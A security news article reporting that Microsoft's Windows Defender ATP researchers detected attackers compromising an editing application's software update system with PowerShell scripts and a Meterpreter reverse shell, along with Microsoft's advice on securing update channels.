Microsoft Warn Users of Cyber Attacks on Windows Software Update System

Earlier this week, the research team which is part of Windows Defender Advanced Threat Protection system, detected several attacks being carried out against a software’s update system whose name has not yet been revealed – All that is known about the software is that it is a well-known editing application and that the creator or vendor of the software also experienced attacks.

The consequences of the attack: It is said that the attackers, by hacking the software update system, were able to gain remote access to certain targeted computers. They were then able to execute malware without the victim knowing about the infection.

How was the carried out: Microsoft’s researchers said that the attackers used PowerShell scripts combined with the Meterpreter reverse shell. This allowed them to silently infiltrate the target and as such the victim was not aware that his or her system was being hacked. Also, it has been said that similar techniques have been used previously to carry out some high-profile attacks whereby the targets were highly valuable systems.

Altair Technologies’ EvLog update process, SimDisk which is an automatic update system for the South Korean software and ESTsoft’s ALZip compression application’s update server were among the victims of previous attacks.

PowerShell activities as detected by Windows Defender ATP

Was the issue resolvedFortunately, the researchers found out about the attacks quite early on, and this enabled them to work in collaboration with security experts of the systems that were targeted, to mitigate the effects of the attack. Those who worked on solving the problem also involved developers and third-party software vendors who were able to stop the attacks in time.

Microsoft’s adviceUpon realizing that such attacks have been made in the past, security researchers at Microsoft have advised third-party software vendors to be more careful when creating update systems. They specifically pointed out the need to have stronger security features placed in such automated update systems, saying that robust encryption is necessary if such attacks are to be prevented in the future.

Furthermore, Microsoft said that it would be much better if software vendors abstained from executing their systems blindly and that they should always validate digital signatures against their own certifications.

Windows Defender ATP detecting anomalous updater behavior

“It’s early discovery allowed incident responders – a collaboration of security experts from the targeted industries and developers working for the third-party software vendor – to work with Microsoft security researchers to promptly identify and neutralize the activities associated with this cyber espionage campaign,” according to Microsoft.

A piece of advice: Masking malware as updates to software is standard practice in the cyber world. Therefore, it is highly recommended that automatic updates be turned off and that you download updates only from trusted sources for legally-downloaded software.


DDoS attacks are increasing, calculate the cost and probability of a DDoS attack on your business with this DDoS Downtime Cost Calculator.

Jahanzaib Hassan